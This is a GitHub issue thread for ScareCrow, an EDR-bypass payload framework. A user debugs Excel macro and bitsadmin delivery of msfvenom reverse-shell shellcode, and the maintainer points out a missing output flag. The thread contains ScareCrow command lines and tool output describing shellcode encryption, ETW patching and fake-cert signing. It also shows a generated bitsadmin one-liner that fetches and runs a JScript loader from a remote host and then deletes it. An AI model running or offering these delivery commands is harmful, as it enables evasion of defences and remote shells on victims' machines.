search

optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.
2.71k stars 503 forks source link

Macro delivery #38

Closed Chomikmarkus closed 2 years ago

Chomikmarkus commented 2 years ago

For some reason macro fails! After generating loader and js file from msfvenom.bin shellcode ./ScareCrow -I msfvenom.bin -Loader excel -domain some.tld -url http://some.com -sandbox -O file.js Host file in server provided in payload, copy macro from ScareCrow adding it to Office 2013 Developper Macro! (As from shellcode it works when I execute cscript file.js i get shell access) From proccess hacker i can actually see Exel contact server URL i provided, but no reverse shell created! Tried with excel and msiexec and wscript Loader, so I am assuming that i have made mistske somewhere!

Chomikmarkus commented 2 years ago

With bits delivery got this error: /ScareCrow -I x64_reverse_https.bin -Loader dll -domain domain.fi -delivery macro -sandbox -url http://services.events

Fear is a TEACHER. the first one you ever had.”

2021/11/27 11:21:18 Error: Please provide the url the loader will be hosted on in order to generate a delivery command root@vps158041:/opt/ScareCrow# ./ScareCrow -I x64_reverse_https.bin -Loader excel -sandbox -delivery bits -domain Domain.fi -url http://services.events

/ / ____ ____ \ __ \ __ _ ___ _/ \_ \_ _/ \/ \ \/_ \/ _ \ \/ \/ / / \ _ / | | \/\ /\ ____| | ( <> ) / /___ /_ >__ /| _ >____ /|| __/ \/_/ \/ \/ \/ \/ \/ (@Tyl0us) “Fear, you must understand is more than a mere obstacle. Fear is a TEACHER. the first one you ever had.”

[] Encrypting Shellcode Using AES Encryption [+] Shellcode Encrypted [+] Patched ETW Enabled [] Creating an Embedded Resource File [+] Created Embedded Resource File With Memo's Properties [] Compiling Payload [+] Payload Compiled [] Signing Memo.dll With a Fake Cert [+] Signed File Created [] Creating Loader [] Bitsadmin [!] One liner command to execute it: bitsadmin /transfer http://services.events/ %APPDATA%\ & cscript //E: JScript %APPDATA%\ & timeout 20 & del %APPDATA%\ panic: open : no such file or directory

goroutine 1 [running]: ScareCrow/Utils.check(...) /opt/ScareCrow/Utils/Utils.go:76 ScareCrow/Utils.Writefile({0x0, 0x1b}, {0xc001d02000, 0x36d09d}) /opt/ScareCrow/Utils/Utils.go:68 +0xf7 ScareCrow/Loader.CompileLoader({0x7fffed20d6fc, 0x5}, {0x0, 0xaec00}, {0xc000130060, 0x8}, {0x6ede4b, 0x4}, {0x7fffed20d715, 0x4}, ...) /opt/ScareCrow/Loader/Loader.go:1040 +0xd05 main.main() /opt/ScareCrow/ScareCrow.go:201 +0xb6c root@vps158041:/opt/ScareCrow#

root@vps158041:/opt/ScareCrow# go version go version go1.17.3 linux/amd64 root@vps158041:/opt/ScareCrow#

Tylous commented 2 years ago

Hello, given the error message and your command your missing the -O for the output file. Try adding -O test.js

Chomikmarkus commented 2 years ago

Figured it already out! Thanks

Chomikmarkus commented 2 years ago

But macro delivery still fails, makes connection where .js loader is hosted but no session is created